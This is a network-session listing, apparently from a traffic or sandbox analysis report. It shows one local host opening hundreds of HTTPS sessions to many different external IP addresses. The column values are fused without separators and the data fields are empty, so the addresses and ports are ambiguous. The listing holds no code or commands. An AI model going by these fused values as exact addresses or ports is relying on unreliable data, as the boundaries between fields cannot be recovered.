                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20411192.168.2.234226042.183.125.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20412192.168.2.234614213.123.153.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20413192.168.2.234934418.202.19.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20414192.168.2.2351244179.199.125.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20415192.168.2.234345264.11.128.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20416192.168.2.2337780205.13.167.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20417192.168.2.235603870.3.81.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20418192.168.2.2343976137.56.33.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20419192.168.2.2333638107.128.43.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20420192.168.2.2337336190.227.194.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20421192.168.2.2350544193.137.134.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20422192.168.2.23601749.0.31.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20423192.168.2.2338122187.254.24.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20424192.168.2.2355856136.149.98.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20425192.168.2.2338844146.127.46.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20426192.168.2.2353192128.231.157.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20427192.168.2.235573663.224.206.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20428192.168.2.2360664165.236.176.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20429192.168.2.2355914186.237.90.83443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20430192.168.2.2351250177.46.58.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20431192.168.2.233777074.101.54.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20432192.168.2.2348392156.87.240.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20433192.168.2.2337462172.196.166.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20434192.168.2.2335094210.95.35.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20435192.168.2.2351244202.226.176.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20436192.168.2.2342718195.99.61.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20437192.168.2.235445814.205.148.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20438192.168.2.235546254.105.164.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20439192.168.2.233327484.147.61.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20440192.168.2.2335072171.216.12.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20441192.168.2.233499294.67.106.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20442192.168.2.234447475.241.108.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20443192.168.2.2357272174.219.138.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20444192.168.2.2357064112.151.33.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20445192.168.2.2334026203.138.237.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20446192.168.2.2359212141.249.243.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20447192.168.2.235887075.187.70.220443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20448192.168.2.2345728114.55.186.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20449192.168.2.234503214.17.39.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20450192.168.2.2347998144.210.210.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20451192.168.2.234249075.112.12.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20452192.168.2.2354654159.144.113.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20453192.168.2.234933873.165.34.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20454192.168.2.2359450120.95.147.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20455192.168.2.2337574113.62.114.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20456192.168.2.2342086175.27.234.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20457192.168.2.2343914194.98.209.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20458192.168.2.233987858.18.142.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20459192.168.2.2337992125.124.197.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20460192.168.2.235717061.227.121.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20461192.168.2.235032414.116.137.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20462192.168.2.234426258.135.212.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20463192.168.2.2353464115.34.54.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20464192.168.2.2355940187.116.14.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20465192.168.2.2335050221.243.209.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20466192.168.2.2348448108.86.85.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20467192.168.2.2333176110.193.28.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20468192.168.2.235377279.211.64.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20469192.168.2.235248093.211.117.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20470192.168.2.2347292194.133.69.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20471192.168.2.2350758171.227.59.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20472192.168.2.2334552203.32.0.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20473192.168.2.2360810173.233.123.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20474192.168.2.233290462.151.46.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20475192.168.2.235087270.23.239.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20476192.168.2.2358860141.80.46.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20477192.168.2.2337190152.69.188.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20478192.168.2.235033865.23.224.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20479192.168.2.2336156144.96.59.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20480192.168.2.2360180141.187.208.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20481192.168.2.234660436.81.193.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20482192.168.2.234948423.131.90.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20483192.168.2.2351928136.179.10.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20484192.168.2.2359170191.4.27.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20485192.168.2.2356582178.101.93.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20486192.168.2.2346996202.170.153.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20487192.168.2.234887663.105.109.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20488192.168.2.2354930114.140.64.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20489192.168.2.2350374218.231.236.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20490192.168.2.2353764181.3.89.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20491192.168.2.2347400156.81.23.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20492192.168.2.23504148.234.186.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20493192.168.2.2332944120.173.47.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20494192.168.2.2335504195.134.137.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20495192.168.2.234508277.24.164.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20496192.168.2.2339212179.172.12.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20497192.168.2.2356978191.167.142.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20498192.168.2.2348730132.205.82.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20499192.168.2.2336476156.78.52.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20500192.168.2.2348694212.8.21.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20501192.168.2.2356706205.3.14.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20502192.168.2.2334486205.18.1.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20503192.168.2.2345666159.74.107.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20504192.168.2.234564817.12.56.22443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20505192.168.2.234438271.87.166.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20506192.168.2.234884484.156.236.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20507192.168.2.2339314181.36.37.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20508192.168.2.233281695.248.178.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20509192.168.2.2344044133.88.105.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20510192.168.2.2336024210.52.11.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20511192.168.2.2338036174.108.180.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20512192.168.2.23512988.1.214.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20513192.168.2.234492681.176.101.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20514192.168.2.2353962119.18.4.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20515192.168.2.2359262193.39.8.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20516192.168.2.2349958117.164.68.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20517192.168.2.2343904165.113.72.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20518192.168.2.235432632.13.141.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20519192.168.2.2333170209.57.80.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20520192.168.2.2338400173.59.150.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20521192.168.2.2340200208.206.27.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20522192.168.2.2336914155.103.32.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20523192.168.2.2353784103.73.79.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20524192.168.2.2354862209.62.205.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20525192.168.2.235407687.95.147.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20526192.168.2.236059264.226.134.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20527192.168.2.2359802208.65.45.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20528192.168.2.2353940113.142.221.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20529192.168.2.236052827.80.173.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20530192.168.2.2356904119.231.249.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20531192.168.2.2344466164.161.132.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20532192.168.2.2356068211.217.122.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20533192.168.2.2355458105.115.154.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20534192.168.2.23376165.255.25.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20535192.168.2.236078844.83.103.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20536192.168.2.234224269.208.249.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20537192.168.2.2349598131.25.136.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20538192.168.2.2353928169.179.36.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20539192.168.2.2349488167.145.127.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20540192.168.2.233656697.67.39.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20541192.168.2.2358808135.152.224.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20542192.168.2.23509942.131.49.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20543192.168.2.2338026196.20.107.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20544192.168.2.2341538125.185.221.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20545192.168.2.235358873.199.163.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20546192.168.2.2334192156.219.233.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20547192.168.2.234678253.46.242.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20548192.168.2.235260648.183.104.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20549192.168.2.235144877.203.49.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20550192.168.2.234071065.113.251.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20551192.168.2.2344916128.208.201.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20552192.168.2.2346850222.251.16.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20553192.168.2.234086020.5.165.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20554192.168.2.2339864158.173.63.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20555192.168.2.2335442156.82.213.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20556192.168.2.2333890195.20.181.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20557192.168.2.233468063.244.241.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20558192.168.2.2349184151.43.63.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20559192.168.2.2338632177.208.248.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20560192.168.2.235230893.172.221.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20561192.168.2.2356524189.197.113.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20562192.168.2.2333246133.127.82.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20563192.168.2.2332992137.87.145.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20564192.168.2.23551904.214.56.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20565192.168.2.2360722134.20.28.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20566192.168.2.233767464.220.184.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20567192.168.2.2341670176.177.37.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20568192.168.2.2359886209.174.44.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20569192.168.2.2343940154.155.177.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20570192.168.2.235879294.157.197.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20571192.168.2.234935676.72.19.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20572192.168.2.2355314108.161.8.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20573192.168.2.2343074113.130.244.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20574192.168.2.235737861.217.237.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20575192.168.2.2342386120.58.29.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20576192.168.2.2358832209.163.250.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20577192.168.2.235612047.162.107.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20578192.168.2.2358938126.140.116.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20579192.168.2.234390052.103.72.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20580192.168.2.23427365.173.250.125443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20581192.168.2.2357860115.38.80.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20582192.168.2.2347132131.11.33.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20583192.168.2.2359456150.33.171.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20584192.168.2.235434012.255.139.53443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20585192.168.2.234033292.195.38.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20586192.168.2.235585412.130.160.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20587192.168.2.2351480161.61.87.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20588192.168.2.234723235.68.170.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20589192.168.2.233389069.28.202.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20590192.168.2.233354481.40.16.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20591192.168.2.235291418.66.45.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20592192.168.2.2357878187.186.254.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20593192.168.2.233389099.129.12.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20594192.168.2.233927634.198.54.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20595192.168.2.2357018143.105.194.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20596192.168.2.2354418104.72.219.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20597192.168.2.234436468.137.96.117443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20598192.168.2.235157212.66.77.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20599192.168.2.235462464.138.39.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20600192.168.2.234716469.220.181.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20601192.168.2.2345898216.198.177.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20602192.168.2.234885432.132.182.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20603192.168.2.2346902187.75.109.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20604192.168.2.2351474147.157.19.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20605192.168.2.2344300163.134.49.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20606192.168.2.235115298.186.169.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20607192.168.2.235350237.86.15.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20608192.168.2.2357946151.174.161.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20609192.168.2.2352796120.47.147.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20610192.168.2.234809878.126.137.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20611192.168.2.2352984203.195.24.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20612192.168.2.233748468.255.225.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20613192.168.2.2339722180.185.166.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20614192.168.2.235408434.83.154.91443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20615192.168.2.2353082200.137.189.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20616192.168.2.2346174114.32.177.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20617192.168.2.2358700220.123.159.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20618192.168.2.2345826102.56.186.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20619192.168.2.233342272.145.165.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20620192.168.2.2338666170.182.221.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20621192.168.2.235147253.190.194.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20622192.168.2.2347068179.34.31.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20623192.168.2.2336216171.32.237.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20624192.168.2.2356006181.28.222.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20625192.168.2.2352012216.158.20.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20626192.168.2.2353332156.206.19.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20627192.168.2.2335874144.211.25.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20628192.168.2.2337334197.128.179.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20629192.168.2.2346236182.69.173.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20630192.168.2.2358872168.115.70.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20631192.168.2.2346638112.4.41.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          20632192.168.2.2350396173.170.153.193443
